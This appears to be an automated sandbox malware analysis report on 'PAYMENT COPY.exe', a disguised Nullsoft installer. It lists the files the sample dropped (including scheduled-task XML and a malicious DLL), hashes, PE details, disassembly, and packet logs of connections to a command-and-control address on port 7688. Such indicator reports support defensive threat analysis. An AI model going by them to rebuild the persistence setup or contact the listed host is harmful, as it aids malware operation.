                                                                  SSDEEP:6144:AtyGrQWot55cT+FsUHBL5xy9j2DL+kl3ZsJx1xEnwXSIIYt:QyGBg55cT+zhL5A9S+kRmj1xpSIH
                                                                  MD5:9B39D5926D9633B180D4AFB3E7CAAC40
                                                                  SHA1:06D5F9B6111F68E35F40A1AA609271F000DA23F1
                                                                  SHA-256:FFE073951D33F7DE224C4892F4EDE7B7368C9A37589263BB73D0B87014CF8D96
                                                                  SHA-512:D0FDA76963586867DCE03AEAE079EEB943EEF56776B909E239EB97200DFA8742F421C342D80D0617528527EF9E10C1869CFEAC8F3078A0F084368DFCC11FD053
                                                                  Malicious:false
                                                                  Preview: ........,...................$...............................................................................................................................................................................................................................................................J...............,...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\nsxD899.tmp
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):306118
                                                                  Entropy (8bit):7.939787418337237
                                                                  Encrypted:false
                                                                  SSDEEP:6144:AtyGrQWot55cT+FsUHBL5xy9j2DL+kl3ZsJx1xEnwXSIIYt:QyGBg55cT+zhL5A9S+kRmj1xpSIH
                                                                  MD5:9B39D5926D9633B180D4AFB3E7CAAC40
                                                                  SHA1:06D5F9B6111F68E35F40A1AA609271F000DA23F1
                                                                  SHA-256:FFE073951D33F7DE224C4892F4EDE7B7368C9A37589263BB73D0B87014CF8D96
                                                                  SHA-512:D0FDA76963586867DCE03AEAE079EEB943EEF56776B909E239EB97200DFA8742F421C342D80D0617528527EF9E10C1869CFEAC8F3078A0F084368DFCC11FD053
                                                                  Malicious:false
                                                                  Preview: ........,...................$...............................................................................................................................................................................................................................................................J...............,...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\ri8clfcgml62un.dll
                                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):6.617616566986233
                                                                  Encrypted:false
                                                                  SSDEEP:192:l1fAHxDSLwXELMtO5KwHXYHCWxDpJL0jWP3p0Oy:cQcELMTSkCWlpxuWR0O
                                                                  MD5:19ACEBD18CD8160A4835FF53469C479B
                                                                  SHA1:486432D9B1752D28D79ACDC037CB54569B83C05D
                                                                  SHA-256:359038B41761F6903B97E9B51DC35C062D4D253AF628BEACBAE79A7D44CF1F22
                                                                  SHA-512:C010B18F028600BC60AE8993690A5142D1CFA23E0AC1C9E8DBFC3974F08E708B8A5F16AFB8633AE16736BC79018A85F2855DF10DEC93356713C5C6235F1CB5E9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 15%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L...dx4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code...L........................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1306
                                                                  Entropy (8bit):5.1109020496994875
                                                                  Encrypted:false
                                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0A+Pp8xtn:cbk4oL600QydbQxIYODOLedq3vqp8j
                                                                  MD5:AFDDA7F0503E444134BC1A8B7DFCB5FD
                                                                  SHA1:9C9EBEE89239A89C3FD750B123DC528B98E38198
                                                                  SHA-256:70317BDEB4DD67C116F85C43427A2EC7369B60DC53B323B9C0897FFAC9E9A027
                                                                  SHA-512:B5FAF6350AB75EAC644059C1B6D9E09A4550BD609DBA55ED7DB22C95DD58D4112274629BC10E17B1D35C8555D012CA949EDEF1235BF4FB2DC79323EAAC3A16F3
                                                                  Malicious:true
                                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                  C:\Users\user\AppData\Local\Temp\tmpF23B.tmp
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1310
                                                                  Entropy (8bit):5.109425792877704
                                                                  Encrypted:false
                                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                  MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                  SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                  SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                  SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                  Malicious:false
                                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):928
                                                                  Entropy (8bit):7.024371743172393
                                                                  Encrypted:false
                                                                  SSDEEP:24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtw:Ik/lCrwfk/lCrwfk/lCrwfk/lCrw8
                                                                  MD5:CCB690520E68EE385ACC0ACFE759AFFC
                                                                  SHA1:33F0DA3F55E5B3C5AC19B61D31471CB60BCD5C96
                                                                  SHA-256:166154225DAB5FCB79C1CA97D371B159D37B83FBC0ADABCD8EBA98FA113A7A3B
                                                                  SHA-512:AC4F3CF1F8F460745D37E6350861C2FBCDDCC1BBDE0A48FB361BFBF5B1EBF10A05F798A72CE413FCA073FF8108955353DDBCBD9D50CED6CDAE231C67A28FDDA3
                                                                  Malicious:false
                                                                  Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:International EBCDIC text, with NEL line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8
                                                                  Entropy (8bit):2.4056390622295662
                                                                  Encrypted:false
                                                                  SSDEEP:3:0I:0I
                                                                  MD5:3CBBBAC199963ABCF4667B290F5BC226
                                                                  SHA1:EF2F3B0E7DF4A2DAEDD2BEF311FBAB7F5C651DE0
                                                                  SHA-256:0C8B09A6E62621A09F742CDC38DB8DC94B247E678DE264A99DAA216EB461087F
                                                                  SHA-512:9E66F75D4907FACD9484986E87D63ECEC7BDCF4EBC2ACA55B4DF5073BFF6FF2A01527C65ED7A6C2A44444C2D4EFCB26D233CEEBCA7B2074AC3387BB67EA135C1
                                                                  Malicious:true
                                                                  Preview: p.....H
                                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):40
                                                                  Entropy (8bit):5.153055907333276
                                                                  Encrypted:false
                                                                  SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                                                                  MD5:4E5E92E2369688041CC82EF9650EDED2
                                                                  SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                                                                  SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                                                                  SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                                                                  Malicious:false
                                                                  Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):327432
                                                                  Entropy (8bit):7.99938831605763
                                                                  Encrypted:true
                                                                  SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                  MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                  SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                  SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                  SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                  Malicious:false
                                                                  Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):43
                                                                  Entropy (8bit):4.458598697157055
                                                                  Encrypted:false
                                                                  SSDEEP:3:oN0naRR1k+PaAdA:oNcSRu+PpA
                                                                  MD5:AC74F0849FB911B24DEBB2AEDEE8E24C
                                                                  SHA1:8797005CAE13E840F2E14E0F787ADA26F24DD32F
                                                                  SHA-256:BBF827B7252E76C927747FE8875F19392D54C070CB743DDE37095715705D0C7B
                                                                  SHA-512:DB156C220C174959351DA1F8D1402AADB261D4383EDDE9297D534F92127680D39E78A177DD271CBF8F7255E199A4963EC896A06AF1A439174AE8E909DD9F9D89
                                                                  Malicious:false
                                                                  Preview: C:\Users\user\Desktop\PAYMENT COPY.exe

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.946662165967432
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:PAYMENT COPY.exe
                                                                  File size:332412
                                                                  MD5:53e8c460446fe305dfc2159961aa6234
                                                                  SHA1:bbebce3965dfc237eac2711a47c141a4f8ff0083
                                                                  SHA256:b082aa828dd2eb42d6e1de8ccd8573ac3096ceee92ad26449fc1df6e490ff4ed
                                                                  SHA512:4043358befd7a7fac79c6e244fc8adb6ca0f61e1f1b8427875455ae82e3df47ea982467bb2c993d4c6ead382f2a3da77faffef96e53712a393c12445e07f01b2
                                                                  SSDEEP:6144:S11QoY9YMstdr55cZ+TsUHBL5xY9j2DLWkl3TsJxdxEn7mZ:+Yxk55cZ+NhL5i9SWkRIjdxBZ
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x403486
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 00000184h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  xor ebx, ebx
                                                                  push 00008001h
                                                                  mov dword ptr [esp+18h], ebx
                                                                  mov dword ptr [esp+10h], 0040A130h
                                                                  mov dword ptr [esp+20h], ebx
                                                                  mov byte ptr [esp+14h], 00000020h
                                                                  call dword ptr [004080B0h]
                                                                  call dword ptr [004080C0h]
                                                                  and eax, BFFFFFFFh
                                                                  cmp ax, 00000006h
                                                                  mov dword ptr [0042F44Ch], eax
                                                                  je 00007FF014AB6A83h
                                                                  push ebx
                                                                  call 00007FF014AB9BFEh
                                                                  cmp eax, ebx
                                                                  je 00007FF014AB6A79h
                                                                  push 00000C00h
                                                                  call eax
                                                                  mov esi, 004082A0h
                                                                  push esi
                                                                  call 00007FF014AB9B7Ah
                                                                  push esi
                                                                  call dword ptr [004080B8h]
                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                  cmp byte ptr [esi], bl
                                                                  jne 00007FF014AB6A5Dh
                                                                  push 0000000Bh
                                                                  call 00007FF014AB9BD2h
                                                                  push 00000009h
                                                                  call 00007FF014AB9BCBh
                                                                  push 00000007h
                                                                  mov dword ptr [0042F444h], eax
                                                                  call 00007FF014AB9BBFh
                                                                  cmp eax, ebx
                                                                  je 00007FF014AB6A81h
                                                                  push 0000001Eh
                                                                  call eax
                                                                  test eax, eax
                                                                  je 00007FF014AB6A79h
                                                                  or byte ptr [0042F44Fh], 00000040h
                                                                  push ebp
                                                                  call dword ptr [00408038h]
                                                                  push ebx
                                                                  call dword ptr [00408288h]
                                                                  mov dword ptr [0042F518h], eax
                                                                  push ebx
                                                                  lea eax, dword ptr [esp+38h]
                                                                  push 00000160h
                                                                  push eax
                                                                  push ebx
                                                                  push 00429878h
                                                                  call dword ptr [0040816Ch]
                                                                  push 0040A1ECh

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x960.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x65ad0x6600False0.675628063725data6.48593060343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x13800x1400False0.4634765625data5.26110074066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xa0000x255580x600False0.470052083333data4.21916068772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x380000x9600xa00False0.4484375data4.27028215028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_DIALOG0x381480x100dataEnglishUnited States
                                                                  RT_DIALOG0x382480x11cdataEnglishUnited States
                                                                  RT_DIALOG0x383640x60dataEnglishUnited States
                                                                  RT_VERSION0x383c40x25cdataEnglishUnited States
                                                                  RT_MANIFEST0x386200x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                  SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                  ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                  USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                  Version Infos

                                                                  DescriptionData
                                                                  LegalCopyrightCopyright Shaanxi
                                                                  FileVersion90.50.10.2
                                                                  CompanyNamesymbolic
                                                                  LegalTrademarksBuol
                                                                  CommentsSaxony
                                                                  ProductNamelightbulb
                                                                  FileDescriptionsurvivor
                                                                  Translation0x0409 0x04e4

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 23, 2021 08:11:57.971867085 CET497117688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:01.054852962 CET497117688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:07.061415911 CET497117688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:17.394999981 CET497257688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:20.453207016 CET497257688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:26.453692913 CET497257688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:35.758625984 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:38.751656055 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:39.653305054 CET768849725185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:39.653495073 CET497257688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:40.105993032 CET768849725185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:44.923953056 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:45.132733107 CET768849728185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:45.132883072 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:45.176296949 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:45.396951914 CET768849728185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:45.410798073 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:45.616755009 CET768849728185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:45.720943928 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:45.939094067 CET768849728185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:45.967158079 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:46.128530025 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:46.329687119 CET768849728185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:46.329785109 CET497287688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:50.471874952 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:50.676709890 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:50.676826000 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:50.677452087 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:50.900098085 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:50.902806997 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.103795052 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.107040882 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.396121025 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.400945902 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.425412893 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.426062107 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.437114000 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.443243980 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.444075108 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.448003054 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.448935032 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.449178934 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.643914938 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.652127981 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.653007030 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.663764954 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.673142910 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.674065113 CET497347688192.168.2.7185.150.24.55
                                                                  Feb 23, 2021 08:12:51.677896976 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.683335066 CET768849734185.150.24.55192.168.2.7
                                                                  Feb 23, 2021 08:12:51.685416937 CET497347688192.168.2.7185.150.24.55
